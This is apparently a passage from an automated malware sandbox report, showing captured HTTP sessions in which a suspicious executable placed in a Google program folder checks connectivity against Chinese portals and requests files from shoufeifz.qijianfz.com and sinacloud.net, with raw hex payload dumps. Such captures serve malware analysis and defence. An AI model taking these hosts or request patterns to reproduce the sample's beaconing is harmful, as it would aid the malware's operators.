                                                                                Dec 5, 2024 14:25:12.908771038 CET1236INData Raw: 44 0f 19 91 71 59 92 a9 2b a2 61 c4 fb 68 e0 15 98 5a ef 70 75 b8 ab 8b 22 4b 5a f8 75 0c 20 f6 52 e0 80 87 03 2d e5 0d db a9 3b f1 1d 2b 85 12 66 43 de bd 52 80 4d 1a 66 e1 20 04 0f da 8b 47 1d 60 11 71 c0 3d 69 31 b6 4e ac 86 80 28 a5 8f 48 f4
                                                                                Data Ascii: DqY+ahZpu"KZu R-;+fCRMf G`q=i1N(HeWxZ5C'1eAsZbfAR21Fc1Tu4 kQHf(q$8"D<Y]Ae5'URk-_yg]iEaHDb)nPx^h
                                                                                Dec 5, 2024 14:25:13.027704000 CET1236INData Raw: e4 60 ae 4f c1 95 0e cc 25 06 a2 e8 65 b5 e1 6b 94 c1 23 8e 40 5c 44 b8 fe 90 af 53 9d d2 65 b4 23 10 11 c4 5c 67 c4 6f 94 cc a0 a0 86 7f 8e 3d a7 20 54 08 ae 90 41 1e 36 2c 0f b4 3c 2d e3 a8 49 da af 16 78 b0 4f a8 b6 98 38 d5 31 84 d1 3e 7d 19
                                                                                Data Ascii: `O%ek#@\DSe#\go= TA6,<-IxO81>}U@=,<,cj&rb'=5$+!4Z""\K,bF,K5pJ2VnUu,O$U(j*/@RKfZqW\01sM`d`,~


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.54971043.153.236.147805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:11.798522949 CET219OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: www.sogou.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:13.479584932 CET564INHTTP/1.1 302 Moved Temporarily
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:13 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                Set-Cookie: ABTEST=0|1733405113|v17; expires=Sat, 04-Jan-25 13:25:13 GMT; path=/
                                                                                P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                Location: https://www.sogou.com/
                                                                                UUID: 0cd3071f-a7cf-43d6-bb09-a659bb751a7e
                                                                                Data Raw: 38 61 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 8a<html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.549711104.192.110.226805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:12.003326893 CET216OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: www.so.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:13.601111889 CET425INHTTP/1.1 302 Moved Temporarily
                                                                                Server: openresty/1.15.8.3
                                                                                Date: Thu, 05 Dec 2024 13:25:13 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                Location: https://www.so.com/
                                                                                Set-Cookie: QiHooGUID=; Max-Age=63072000; Domain=so.com; Path=/
                                                                                Data Raw: 38 65 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 8e<html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.549712163.181.92.233805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:12.109844923 CET221OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: www.sina.com.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:13.362621069 CET580INHTTP/1.1 302 Found
                                                                                Server: Tengine
                                                                                Date: Thu, 05 Dec 2024 13:25:13 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 242
                                                                                Connection: keep-alive
                                                                                Location: https://www.sina.com.cn/
                                                                                X-DSL-CHECK: 5
                                                                                X-Via-CDN: f=aliyun,s=ens-cache3.de5,c=8.46.123.228;
                                                                                Via: ens-cache3.de5[,0]
                                                                                Timing-Allow-Origin: *
                                                                                EagleId: a3b55c9717334051131616033e
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 72 65 73 69 64 65 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 64 65 72 20 61 20 64 69 66 66 65 72 65 6e 74 20 55 52 49 2e 3c 2f 70 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>302 Found</h1><p>The requested resource resides temporarily under a different URI.</p><hr/>Powered by Tengine</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.549713103.235.47.188805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:13.042954922 CET219OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: www.baidu.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:14.601835966 CET1236INHTTP/1.1 200 OK
                                                                                Bdpagetype: 1
                                                                                Bdqid: 0xedcd5c8a00b751b5
                                                                                Connection: keep-alive
                                                                                Content-Encoding: gzip
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Date: Thu, 05 Dec 2024 13:25:14 GMT
                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                Server: BWS/1.1
                                                                                Set-Cookie: BAIDUID=DF67C95B68FE3902838F5D3A2A969041:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                Set-Cookie: BIDUPSID=DF67C95B68FE3902838F5D3A2A969041; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                Set-Cookie: PSTM=1733405114; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                Set-Cookie: BAIDUID=DF67C95B68FE3902E4F6F892049D15C0:FG=1; max-age=31536000; expires=Fri, 05-Dec-25 13:25:14 GMT; domain=.baidu.com; path=/; version=1; comment=bd
                                                                                Set-Cookie: BDSVRTM=2; path=/
                                                                                Set-Cookie: BD_HOME=1; path=/
                                                                                Traceid: 1733405114343403521017135453905001861557
                                                                                X-Ua-Compatible: IE=Edge,chrome=1
                                                                                X-Xss-Protection: 1;mode=block
                                                                                Transfer-Encoding: chunked
                                                                                Data Raw: 37 31 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 69 73 5c 4b 76 18 f8 9d bf a2 04 44 8b 64 17 6a df 0b cd 27 11 20 48 82 0b 08 12 dc f5 7a 10 b7 6e dd 5b 55 44 6d a8 5b 55 d8 cc 08 c9 9e b6 ec f1 68 0b 85 ed 18 4b e3 19 29 c2 13 33 11 33 2d 39 46 1e 6b 24 4b fa 31 ee f7 ba fb d3 fc 85 39 e7 e4 72 73 bb b5 80 a0 64 47 b8 d1 ef bd aa 5b 79 33 4f 9e 3c 79 f2 ec f9 a3 5f 79 f0 62 f7 f5 87 c3 bd 54 77 3a e8 7f f3 a3 5f c9 64 8e 5e df 7f fd e6 28 f5 e2 69 26 f3 cd 8f d8 d3 6e e0 b5 bf f9 d1 20 98 7a d0 6c 3a ce 04 a7 b3 de fc de c6 ee 68 38 0d 86 d3
                                                                                Data Ascii: 71dis\KvDdj' Hzn[UDm[UhK)33-9Fk$K19rsdG[y3O<y_ybTw:_d^(i&n zl:h8
                                                                                Dec 5, 2024 14:25:14.601860046 CET1236INData Raw: cc eb 8b 71 b0 91 f2 d9 b7 7b 1b d3 e0 7c 9a c3 17 b7 fd ae 37 89 82 e9 bd d9 34 cc d4 37 1c 3d bc cf bc b9 9f d9 1d 0d c6 de b4 d7 ea ab 9d ec ef dd 0b da 9d 60 cb ef 4e 46 83 e0 5e 41 bc 2d 47 f1 fa 67 de 45 b4 91 1a 7a f0 f3 c6 24 08 83 c9 24
                                                                                Data Ascii: q{|747=`NF^A-GgEz$$f?&|!Oo"O{???//[?gw?~
                                                                                Dec 5, 2024 14:25:14.601871967 CET1236INData Raw: 8e 4e bb 6c 86 c0 f0 1c 8b 7d d6 ed 4d 83 0c 90 a2 1f 00 8f 38 9b 78 e3 6d 63 5b 7f 4e 04 29 05 f8 e6 db ab 00 e8 db e6 bb 87 3e 73 ac d6 00 ab 88 59 d8 7c a9 fc 36 f0 0b 38 71 bd 3e 20 a7 d7 19 36 07 c0 36 fa c1 82 fe 71 87 5c 71 e8 09 c1 40 b3
                                                                                Data Ascii: Nl}M8xmc[N)>sY|68q> 66q\q@Uv#$oAqgn9$pjA.$Tb,ALl73$q*+Lk ZGjOH#+ m%lO%`7 8%OdJa#AQYPf
                                                                                Dec 5, 2024 14:25:14.601968050 CET1236INData Raw: 34 87 45 0b b8 d2 1c 52 59 30 47 71 47 06 99 9a b7 16 53 2b e0 1a 66 ce de ea f6 d0 4c 78 41 af 09 23 08 9b 8a 32 91 62 b1 b8 1a 20 64 4a d1 66 bf da 7b 2d 26 92 da f6 af 15 46 56 6d 9b a6 f9 12 79 b7 4b be 14 2b d4 28 34 2a f7 4b db dc 3c 00 a7
                                                                                Data Ascii: 4ERY0GqGS+fLxA#2b dJf{-&FVmyK+(4*K<2py#$Bea\%-gucM]wuL~rfvJ|+W9'd0&a\>Pzuahy6Hzf )'0!Y5GPRkRNhD.?3VkM:-N
                                                                                Dec 5, 2024 14:25:14.602047920 CET1236INData Raw: 42 36 5f df c2 7f dd 4d 84 10 06 3e e6 9e ef 84 a9 d2 c0 ac 8d e6 df e6 e6 7d 5d 39 51 65 50 5c 73 b6 72 35 14 26 ec 93 c0 dc 3a aa f8 a1 b8 1d 61 8e 0e 59 56 d0 63 91 6d 7f 3c e0 93 50 27 e7 c8 65 e7 c5 94 ce a6 6a 8a d9 b7 6f 0b 1d 15 19 58 a2
                                                                                Data Ascii: B6_M>}]9QeP\sr5&:aYVcm<P'ejoXsKqqM&[w!$q,R,m]F7?g'b.B%`_l|Cjl4ZVkv{jO^oCnna[ne[N:m[-oM[84xiw+v)
                                                                                Dec 5, 2024 14:25:14.602060080 CET1236INData Raw: e3 84 55 ce 4d c6 10 07 bb c0 ed d4 18 2d 58 6a 9a 95 c0 25 31 5f f6 88 b5 c3 c9 b1 fc d5 8d 6f 2b ad 7a eb db 72 58 29 6d e0 3b 5d f1 0e 2e 25 5f 02 92 8a 44 12 09 46 c7 de da c4 21 25 68 16 15 e0 03 6e db 20 87 0d 4f 86 a5 30 49 78 40 8b 66 18
                                                                                Data Ascii: UM-Xj%1_o+zrX)m;].%_DF!%hn O0Ix@f<o:VR'm)?Z]0)QuT1a\]nd`7LRH1@s<a@K8F}kj0ZL@*<:M5EG4|Mva|k|M!3+nXJ
                                                                                Dec 5, 2024 14:25:14.602102995 CET1236INData Raw: 8d 7f 3f b7 86 67 f8 57 7b c0 7a 52 da 20 6c 6d 59 13 26 af ea b3 10 3e 2d 05 5a f6 48 f4 c2 1b a8 d3 e1 fd 68 33 12 b2 b0 3a 29 de 4e 9d 17 6f a6 4e 8d b7 d2 67 c7 db a9 13 94 bd a9 73 14 c3 aa d3 24 57 b4 7a 64 52 14 85 58 0b fc 55 47 01 1d 2e
                                                                                Data Ascii: ?gW{zR lmY&>-ZHh3:)NoNgs$WzdRXUG.pMtxuZXi8&hGb:|#O@Hk5'Zbi6p8PDObffX[YSfLfJ.al:aUn|aMNA9Z%E7X(
                                                                                Dec 5, 2024 14:25:14.602118015 CET1236INData Raw: 04 c2 fb 72 bd 98 1f 98 87 f6 b3 3d 04 3f 8b 7d 24 d2 a7 b4 4b 05 ae 47 ef 2c 5f c4 11 0e ee 94 d9 d8 46 68 20 2b 73 a7 bc 6b 95 70 ad ba 24 71 14 92 f5 93 9b 17 73 94 8b c4 ed 26 ba 13 17 88 0e 6c 32 50 42 0d 73 60 20 d6 48 77 4f cb f5 36 79 37
                                                                                Data Ascii: r=?}$KG,_Fh +skp$qs&l2PBs` HwO6y7|$OjX;Cd5oh~`>Sv_.`[C(\>8EvT=3sbQ.+Tp!m{2ciQ}qL-Ft(?IDTk`3xUze#E=[-
                                                                                Dec 5, 2024 14:25:14.602406025 CET1236INData Raw: 47 c0 08 4c 06 dc 14 12 52 f6 75 65 78 e9 ee 5b eb e6 4a 0d 52 1c dc 36 1b eb 07 50 7c 96 0a df 03 18 00 f9 47 c6 ce 69 35 14 98 b1 b8 90 c0 2e 3f 58 ec 08 4c 36 88 3c de f8 d1 4e 1c 14 8d 49 f0 1e 5e 65 56 90 37 cc c1 75 15 ac 2e 86 d7 1f 77 bd
                                                                                Data Ascii: GLRuex[JR6P|Gi5.?XL6<NI^eV7u.w;<d^1-"7)UDEetK2h]ckbr.cHGZiDtf\VtZ`,E uy@XiGv^nNlCCLgsC}c"[\^Gf#(ylU~VJAA
                                                                                Dec 5, 2024 14:25:14.602418900 CET1236INData Raw: 3a 94 e0 ba 0d f8 c3 83 55 1d 1a 9a 6e 99 0f cc 15 67 93 d2 c4 18 a3 8b 38 8e 37 e1 07 d9 a5 ba be a6 3a a3 ac ce c2 c1 8c e0 ee 6a 58 2b d6 f4 48 7e 13 0a fe 86 39 b1 35 de e4 01 df 2c 67 c8 7c 4f 61 97 71 4c b1 1b d9 19 47 54 ed 97 75 4a 24 ad
                                                                                Data Ascii: :Ung87:jX+H~95,g|OaqLGTuJ$mi'fPkyBsfjI.{M21tVShF3sDsDz8$uE03;q[j^QBV`Xk=x+\Gkx`kerP]79zikYe
                                                                                Dec 5, 2024 14:25:14.721729040 CET1236INData Raw: 3b 56 eb ee ac 59 36 15 35 0b 86 e5 0b b0 8d 9f f7 3c b0 41 57 ea 15 bf 10 f8 b5 b6 85 6d f3 f4 f4 11 ea 05 a8 b0 41 55 45 fc 6b 83 7a 09 37 3c 01 a0 7e 2b 2c 7a e0 45 f7 fc af 00 a8 48 eb 22 3a bf 01 22 3e 3d fd 34 cd 34 ea f9 86 0f e6 db 6a f0
                                                                                Data Ascii: ;VY65<AWmAUEkz7<~+,zEH":">=44j .S6Ui^)gd+Y8Cb6lRvAQH;-HiBFGGT01RSu&}+2t:pb*p&|b'ZCm3


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.549715119.28.131.242805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:13.770395994 CET416OUTGET / HTTP/1.1
                                                                                Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
                                                                                Accept-Language: en-CH
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                Host: shoufeifz.qijianfz.com
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:15.654213905 CET1236INHTTP/1.1 200 OK
                                                                                Content-Type: text/html
                                                                                Content-Encoding: gzip
                                                                                Last-Modified: Thu, 05 Dec 2024 06:24:27 GMT
                                                                                Accept-Ranges: bytes
                                                                                ETag: "e4101b56de46db1:0"
                                                                                Vary: Accept-Encoding
                                                                                Server: Microsoft-IIS/8.5
                                                                                Date: Thu, 05 Dec 2024 13:25:15 GMT
                                                                                Content-Length: 1349
                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 fe c7 bf f7 1f 7c fc bb ce aa 69 7b bd ca d3 79 bb 28 8f 7e e3 e4 31 7e a6 65 b6 bc f8 ec a3 7c f9 11 7f 92 67 33 fa 99 d2 f3 78 91 b7 59 3a 9d 67 75 93 b7 9f 7d f4 d5 9b 67 db 07 68 43 5f e9 77 cb 6c 91 7f f6 d1 65 91 5f ad aa ba fd 48 be 92 67 5a 2d db 7c 49 af 5d 15 b3 76 fe d9 2c bf 2c a6 f9 36 ff 31 4a d7 4d 5e 6f 37 d3 ac cc 26 65 fe d9 b2 1a a5 c5 b2 68 8b ac e4 0f f3 cf 76 c7 3b a3 74 91 bd 2b 16 eb 45 f0 11 35 0b 3e 0a d1 99 b7 ed 6a 3b ff 45 eb e2 f2 b3 8f 7e ef ed af 8e b7 4f aa c5 2a 6b 0b ea e4 23 87 50 91 7f 96 cf 2e 72 fb 6a 5b b4 65 7e f4 b4 9a ae 17 f4 fd e3 bb f2 b7 7e 59 16 cb b7 69 9d 97 9f 7d d4 b4 d7 65 de cc f3 bc fd 28 9d d7 f9 b9 7e 32 9e 36 0d 40 3d be [TRUNCATED]
                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"|i{y(~1~e|g3xY:gu}ghC_wle_HgZ-|I]v,,61JM^o7&ehv;t+E5>j;E~O*k#P.rj[e~~Yi}e(~26@={<fNtZfMG4y_t?(+^f-t{;wGOpb>J?En]4hw<UWVR>GGg_GMgUG?}7wW_7)_G_1w<Ka<6C7gwwG/<K ;@xa_z?O?u^oW|2Z=Kg__ADw_)9'_ywI_gGlg?ppwe{L@?_xpOw/>wM.~1?^Bc|DT
                                                                                Dec 5, 2024 14:25:15.654232979 CET385INData Raw: bf e1 f5 83 31 b5 f9 cf fe 9e bf f2 3f ff 53 ff e0 ff ec ef fa e3 ff 8b 3f ed 6f fc 2f fe b8 3f f8 3f ff 9b fe e0 ff e2 8f fb 43 08 89 1b df a5 57 a4 f1 7f fe 0f fc 99 d4 fe bf f8 13 fe aa ff ea 8f ff 93 52 33 f2 fb 9f 7e ba 73 70 ef d3 7b f7 6f
                                                                                Data Ascii: 1?S?o/??CWR3~sp{op_''Q7DS+w{y6lT*k:RS]MCLXE_A_E\v7-i"Rf__
                                                                                Dec 5, 2024 14:25:15.667171955 CET355OUTGET /style.css HTTP/1.1
                                                                                Accept: */*
                                                                                Referer: http://shoufeifz.qijianfz.com/
                                                                                Accept-Language: en-CH
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                Host: shoufeifz.qijianfz.com
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:16.671552896 CET918INHTTP/1.1 200 OK
                                                                                Content-Type: text/css
                                                                                Content-Encoding: gzip
                                                                                Last-Modified: Sat, 13 Oct 2018 11:50:08 GMT
                                                                                Accept-Ranges: bytes
                                                                                ETag: "0188be3ea62d41:0"
                                                                                Vary: Accept-Encoding
                                                                                Server: Microsoft-IIS/8.5
                                                                                Date: Thu, 05 Dec 2024 13:25:15 GMT
                                                                                Content-Length: 649
                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 be f5 8b 7f e3 24 a5 67 91 d5 17 c5 f2 d1 ce a1 fc b9 ca 66 b3 62 79 61 ff 2e 8b a6 dd 6e da eb 32 7f 94 2e ab 65 4e 1f ff 92 df 38 c9 f4 e5 36 7f d7 6e cf f2 69 55 67 6d 51 2d 6d 13 fa 2a 9d 56 65 55 3f 4a 7f 7c 67 07 b0 e8 a5 f1 e4 42 5f 9b 64 d3 b7 17 75 b5 5e ce ec f7 f4 69 7a 55 cc da f9 a3 fb bb 3b ab 77 fa c9 3c 2f 2e e6 ed a3 bd 87 ee 23 83 e0 7d fb c9 dd 6f cd 8a 66 55 66 d7 8f d2 f3 32 7f 77 f8 ad bb f2 79 75 99 d7 e7 65 75 f5 28 9d 17 b3 59 be a4 e6 82 c5 9e a2 21 fd ed ee ec fc ee f4 15 fd 6d bb db 71 dd 09 79 b6 db 6a f5 28 dd 93 8f 2d 98 df 7f 57 01 e9 50 eb 7c 46 5f d3 df 0e 32 bf 40 1f 10 66 55 d6 3e 4a cb fc bc a5 4f e4 b3 ef d6 45 4b 43 d9 5e 54 b3 fc 11 21 db [TRUNCATED]
                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"$gfbya.n2.eN86niUgmQ-m*VeU?J|gB_du^izU;w</.#}ofUf2wyueu(Y!mqyj(-WP|F_2@fU>JOEKC^T!.kj@H_(1y6?")X^m:zRobo+Yc9O80^vv???y(Jos?~Z?lXyJ1v5zt^v{#q=>>0o"{"F,Ojg<8Ey`oR?:`$|%R7!80JN!-9/"


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.54971727.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:14.433376074 CET236OUTGET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:16.212343931 CET504INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:07 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 35eea2be-2412-0521-2515-6c92bfce6724
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 65 65 61 32 62 65 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 31 35 2d 36 63 39 32 62 66 63 65 36 37 32 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>35eea2be-2412-0521-2515-6c92bfce6724</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.54971627.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:14.433428049 CET244OUTGET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:19.205837965 CET512INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:10 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32b98376-2412-0521-2518-b4055d752c87
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 62 39 38 33 37 36 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 31 38 2d 62 34 30 35 35 64 37 35 32 63 38 37 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
